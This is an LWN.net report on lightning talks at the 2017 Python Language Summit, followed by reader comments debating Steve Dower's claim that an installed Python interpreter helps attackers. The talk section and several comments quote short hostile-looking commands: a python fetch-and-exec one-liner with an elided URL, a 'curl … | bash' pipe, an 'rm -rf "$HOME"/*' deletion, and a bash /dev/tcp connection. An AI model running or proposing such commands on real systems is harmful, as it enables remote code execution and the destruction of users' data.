Language summit lightning talks

By Jake Edge
June 7, 2017

Over the course of the day, the 2017 Python Language Summit hosted a handful of lightning talks, several of which were worked into the dynamic schedule when an opportunity presented itself. They ranged from the traditional "less than five minutes" format to some that strayed well outside of that time frame—some generated a fair amount of discussion as well. Topics were all over the map: board elections, beta releases, Python as a security vulnerability, Jython, and more.

MicroPython versus CPython

The first entry here was not actually billed as a lightning talk, but it fits the model pretty well. Mark Shannon briefly described some of the differences between MicroPython and the CPython reference implementation right after lunch. MicroPython is an implementation of the language that targets microcontroller hardware; LWN looked at it running on the pyboard development hardware back in 2015.

Larry Hastings introduced the session by noting that MicroPython is the first competing implementation that has Python 3 support. Shannon held up a BBC micro:bit board, which runs MicroPython and has been given to students in the UK, and noted that it only has 16KB of memory. He asked how many attendees had 16GB in their laptops and got a few hands.

MicroPython is a severely memory-constrained version of Python 3, but it does come with most of the standard library. In fact, it has asyncio support, for example. It is not CPython, but is a completely new implementation of the language. The micro:bit has 256KB of flash memory and MicroPython runs from the flash. Most of the data is immutable and lives in flash as well. Hastings noted that MicroPython has a tracing garbage collector, rather than using reference counting as CPython does.

Michael Foord spoke up to extol the micro:bit device, which costs around $20. It is "easy to play with" and has almost all of the features of Python, including the dynamic features. There is a book coming out in June about it. Overall, "it is a great, fun thing to experiment with."

PSF board

In the first real lightning talk, Hastings had a suggestion for the assembled core developers: run for the Python Software Foundation (PSF) board of directors. He noted that the 2006-2007 board was dominated by core developers (seven out of eight), while the 2016-2017 board has a single core developer (Kushal Das).

He said that he thought it would be "lovely to see more core developers" on the board, so he asked those present to nominate themselves (or other core developers) by the May 25 deadline, which was one week away when he gave the talk. When Hastings was asked if he would be running, though, he said "I don't have time for that" with a bit of a grin. In the end, the board nominations have closed; there are two core developers (Das and Thomas Wouters) on the list, which has 22 entries for 11 seats.

Why beta?

Łukasz Langa questioned the value of the beta phase for Python releases in his lightning talk. He asked: "did your company use the beta of 3.6?" The beta period is nearly five months long and is meant to "surface issues" in the code, but he is not really sure that is happening. So he is concerned that the project is not using that time well.

Furthermore: "what is the point of the 3.6.x point releases?" He wondered if a stable branch would better serve the community. But many attendees responded that the point releases were valuable and that an always-stable branch would not suit their needs.

Where Langa works, at Facebook, the point releases have not been all that helpful; they introduce regressions and "some are pretty bad". His perspective may be somewhat skewed, however, since his code base is heavily dependent on the asyncio and typing modules. But, by running his tests on code from the 3.6 branch, he was able to find a bug that was introduced after 3.6.0 and get it fixed before 3.6.1 was released.

He suggested that more people start testing before the releases are made. He has already been doing some testing on the 3.7 branch, for example. He noted that Brett Cannon has a blog post about doing that. Core developers should also be aware that there are some people out there testing what is getting committed to stable, and even development, branches.

Barry Warsaw noted that Linux distributions use the betas and release candidates as they prepare for their releases. Ned Deily said that getting "more eyes on daily builds" would be great, but the point releases are important because of all the different platforms that need to be supported. But Langa is not advocating getting rid of the point releases; since there are no betas for point releases, he wants to see more testing before the release. But point releases are only for bug fixes, Deily said, not for new features. Langa is concerned that point releases also introduce regressions, however.

The beta release provides an important psychological barrier for developers, Guido van Rossum said, it is not meant for customers. Another attendee pointed out that the release candidate(s) for point releases are effectively the betas for those releases. But there is little testing of betas or release candidates, Langa said; there are always small things that are wrong and clearly have not been tested.

Beta releases do provide a platform for third-party developers, though, Deily said. Libraries and modules can test with them to ensure their code will work with the upcoming release. Python upstream does make that available, Langa said, but the external world is not really using it. The alternative is for the Python project to do more of that testing itself, Deily said.

Stable branches open up another pitfall, though, an attendee said. For example, at one point NumPy added a feature in its Git repository that needed to be changed fairly soon afterward. Unfortunately, SciPy had committed its own change based on that code, so NumPy had to carry backward compatibility hacks for a feature that was never intended to be stable. Once something has been committed to a stable branch in Git, people assume that it is completely baked; "if it breaks later, it is our problem".

Another attendee suggested that other projects are not likely to test with a beta release, but might with a release candidate. That led Hastings to jokingly suggest that Python "just cross out the word beta and replace it with rc [release candidate]". "In crayon", Warsaw added with a grin.

Ordered dictionaries

CPython 3.6 changed its dictionary implementation to one that is more compact, so it uses less memory, but that also preserves the order that keys are inserted. That resolves PEP 468, which is about preserving the order of keyword arguments in the dictionary passed to functions, but it may have an unintended side effect as well. Gregory P. Smith wanted to discuss that in his lightning talk.

Smith is concerned that Python code will start to rely on the fact that dictionary insertion order is preserved, which is, for now, simply a CPython implementation decision. Other Python implementations may make other choices, so some code could break unexpectedly. He wondered if a change should be made for Python 3.7.

In particular, he suggested that the iteration order for dictionaries could be changed slightly. Those that need ordering could use collections.OrderedDict explicitly. He said that the disordering does not need to be random, necessarily, though that would be fine, it just needs to change the order enough so that reliance on ordering would be picked up in testing.

He suggested that, for 3.7, either the ordering be broken or that Python declare that all dictionaries must be ordered. If the latter is done, would there be a need for an UnorderedDict, an attendee asked. Smith did not think there would be any users for that, but it could be done if needed. The issue is now on the core developers' radar, but no firm conclusion was reached in the talk.

Python as a security vulnerability

Steve Dower had a provocative title for his lightning talk: "Python is a Security Vulnerability". His point was that Python (and other, similarly powerful languages) installed on a system gives attackers a tool that can be easily used to further their aims. Normally, when we think of security vulnerabilities, we think of things like buffer overruns, but in some sense, the Python language and its libraries also qualify.

He said he often hears statements like "I love it when I find a system with Python installed ... it's basically already owned". Red teams and penetration testers love to find Python on systems they access, he said. As a thought experiment, he posited that if you could somehow get one shell command executed on a workstation inside the US National Security Agency (NSA), that command might well be something like:

    python -c "exec(urlopen(...).read())"

Adding it as a cron job would be even more effective.

So, what should be done about this? The Python core development community needs to acknowledge the problem; it is the reason that many corporate networks ban Python, for example. The community should also look for ways to change Python to make things better. Creating a locked-down version of the language and libraries to make it harder for attackers to abuse might be something to consider.

PyCharm update

A brief update on the PyCharm integrated development environment (IDE) for Python was up next. Dmitry Trofimov and Andrey Vlasovskikh noted that for the first time, Python 3 use was larger than that of Python 2 in PyCharm. Almost all of the Python 2 use is 2.7, while Python 3 has mostly 3.5 and 3.6 users, though there is a lingering contingent of 3.4 users.

The PyCharm debugger now supports the PEP 523 frame evaluation API. That has sped up the debugger by 20x; it started out as a 40x improvement, but that dropped to the current level when a subtle bug was fixed. It is a rare PEP that affects the debugger, they said; there should be more of those. The API should also be considered for backporting to 2.7, they said.

They also wanted to point out the new profiler for Python, VMProf (documentation here). It was developed by the PyPy project with cooperation from JetBrains, which is the company behind PyCharm. VMProf is a native profiler for Python that runs on macOS, Windows, and Linux.

Jython

The final lightning talk was given by Darjus Loktevic, who lamented the sad state of the Jython project, which is an implementation of Python for the Java virtual machine. Jython is still under development, he said, but it has a small team (2-5 active developers). The project is close to releasing Jython 2.7.1, which is more or less the same as CPython 2.7.11. It has a Jython Native Interface (JyNI) that can be used to run Python's C extensions (e.g. NumPy) in Jython.

But, he asked, is Jython still relevant today? The question came up in a Reddit thread recently, he said. The problem with Jython is that it is not Python enough to run things out of the box—tests fail, little bits and pieces are different or not supported. On the other hand, Jython is not Java enough either; it is not a great scripting language for Java and it is stuck on 2.7, which is not that great, he said.

The "killer features" for Jython are that it can call Java classes from Python code and that it lacks a global interpreter lock (GIL). Jython has had no GIL for a long time, but no one seems to care, Loktevic said. Maybe more would care if some of the other features were sorted out better.

Going forward, there will be an effort to make JyNI better, so that more C extensions can run. Also, the clamp project will allow Python code to be compiled into Java jar files so it can be directly imported into Java. Jython plans to move to GitHub and reuse the core workflow. His talk had to wind down rather abruptly at that point as the summit had run more than an hour late.

[I would like to thank the Linux Foundation for travel assistance to Portland for the summit.]

Index entries for this article
Conference	Python Language Summit/2017

Language summit lightning talks

Posted Jun 8, 2017 10:40 UTC (Thu) by mb (subscriber, #50428) [Link] (9 responses)

>he posited that you could somehow get one shell command executed on a workstation inside the US National Security Agency (NSA); that command might well be something like:
> python -c "exec(urlopen(...).read())"

Or it might be
rm -rf "$HOME"/*
or something similar.
I don't see how Python is a problem here.

Language summit lightning talks

Posted Jun 8, 2017 16:21 UTC (Thu) by stevedower (guest, #116614) [Link] (8 responses)

Python is certainly not unique, but when your audience is the Python core development team it makes sense to focus on that one rather than all the other tools that also let you run large volumes of unverified and untraceable arbitrary code :)

Language summit lightning talks

Posted Jun 8, 2017 20:51 UTC (Thu) by mb (subscriber, #50428) [Link] (7 responses)

> it makes sense to focus on that one

No, it doesn't.
You're lost already if you can execute arbitrary binaries.
If that is python, bash, perl or anything else does not matter at all.

To make it even worse, the following sentence simply is complete nonsense:
> ... if you could somehow get one shell command executed on a workstation ... that command might well be something like: python

If you have a shell, you already have a turing complete language. You don't need Python.

Language summit lightning talks

Posted Jun 8, 2017 20:53 UTC (Thu) by mjg59 (subscriber, #23239) [Link] (5 responses)

> If you have a shell, you already have a turing complete language. You don't need Python.

If your goal is to exploit a kernel vulnerability in a device driver then you're going to find it much easier to call ioctl() from Python than from bash

Language summit lightning talks

Posted Jun 9, 2017 9:31 UTC (Fri) by NAR (subscriber, #1313) [Link] (3 responses)

I think the question is not that is it easy or not, but is it possible or not. It's enough if one person implements and releases the technique to call ioctl() from shell (something like "upload this binary garbage, write it to a file, give execute permissions, execute with these parameters"), the rest of the world can (ab)use it. By the way, on the system I'm typing this comment, there's a tool called blockdev installed which (according to its manual) is used to "call block device ioctls from the command line". So it looks like calling some ioctls is not that complicated, at least on this system.

Language summit lightning talks

Posted Jun 9, 2017 18:41 UTC (Fri) by mjg59 (subscriber, #23239) [Link]

If you've got some sort of executable control mechanism then uploading new binaries isn't going to get you very far. Python is definitely more interesting, since it doesn't have any mechanism for verifying that the code it's about to execute is itself trustworthy (especially since you can pass that code as an argument)

Language summit lightning talks

Posted Jun 10, 2017 0:25 UTC (Sat) by nybble41 (subscriber, #55106) [Link] (1 responses)

> So it looks like calling some ioctls is not that complicated, at least on this system.

It might be worth pointing out that Perl also provides a built-in mechanism for invoking raw ioctls on any file descriptor[1], so this issue is hardly specific to Python. If anything, a Perl script to perform ioctls would probably be more likely to work on arbitrary systems than the equivalent Python script. If an attacker can run code of their choice in just about any general-purpose scripting language, you've already lost.

[1] https://perldoc.perl.org/functions/ioctl.html

Language summit lightning talks

Posted Jun 10, 2017 7:22 UTC (Sat) by mjg59 (subscriber, #23239) [Link]

Yeah Python certainly isn't special here, there's any number of interpreted languages that give the same capability. But bash isn't really one of them, and so it's reasonable to distinguish between "arbitrary shell access" and "I can execute a full featured language interpreter"

Language summit lightning talks

Posted Jun 9, 2017 15:38 UTC (Fri) by hkario (subscriber, #94864) [Link]

Do you know that regular bash can do TCP connections?

https://www.linuxjournal.com/content/more-using-bashs-built-devtcp-file-tcpip

from there:

exec 3<>/dev/tcp/www.google.com/80
echo -e "GET / HTTP/1.1\r\nhost: http://www.google.com\r\nConnection: close\r\n\r\n" >&3
cat >&3

Language summit lightning talks

Posted Jun 9, 2017 10:47 UTC (Fri) by jwilk (subscriber, #63328) [Link]

Turing completeness is about computational power.
It's neither sufficient nor necessary to do malicious stuff.

Language summit lightning talks

Posted Jun 8, 2017 11:01 UTC (Thu) by grawity (subscriber, #80596) [Link] (2 responses)

that command might well be something like:
python -c "exec(urlopen(...).read())"

By the same logic, that command might well be something like:

curl http://… | bash

It has nothing to do with Python – the same applies to literally any code interpreter, even if you do what PowerShell does and require code signing for all scripts. Once you have code execution, you have code execution.

Language summit lightning talks

Posted Jun 8, 2017 15:37 UTC (Thu) by dps (guest, #5725) [Link]

If you do fascist security moves like making /tmp, and other similar places to the extent they exist, be seperate fileystems and mounting it with the noexec option, then finding a writeable places to store a binary so can run it might be really difficult. Attempting to bypass noexec by using ld-linux.so.2 or ld-linux_x86_64.so.2 does not work. I don't need execute permission to run pure python malware. I could also run shell scripts too but the access I can get to system calls is much less, expecially on stripped down systems with everything not required removed.

In the case of python code I might suggest adding a signature and using a modified version of python which will only run signed scripts and check for execute permission first. Compling lots of things into C extensions using something like cython might make this a bit easier and more convincing. I have not met a corporate environment where python is banned but then I also have always had a C compiler and a job which involves writing non malicious python scripts.

Where I currently work even the production boxes have tools like gdb installed, which makes me think that somebody having a long and hard look at what is actually required and removing everything not required woud be really good idea. python would make the cut because quite a lot of things that should be present are actually written in python. I suspect that at least some of the other p* languages, which are currently installed, would not.

Language summit lightning talks

Posted Jun 10, 2017 10:40 UTC (Sat) by robert_s (subscriber, #42402) [Link]

Not quite. If you do the curl trick your script (executed in bash) has to probe for the existence of the various tools it may need to do what it wants to.

In the python example, the executed python code almost always has access to the full, predictable, python standard lib. Which I think is the crux of the issue - the "batteries included" nature of python.

Of course, this isn't about it being an absolute security factor, of course code execution is code execution, it's about the added convenience for the attacker. And no, I have no solution to propose for it.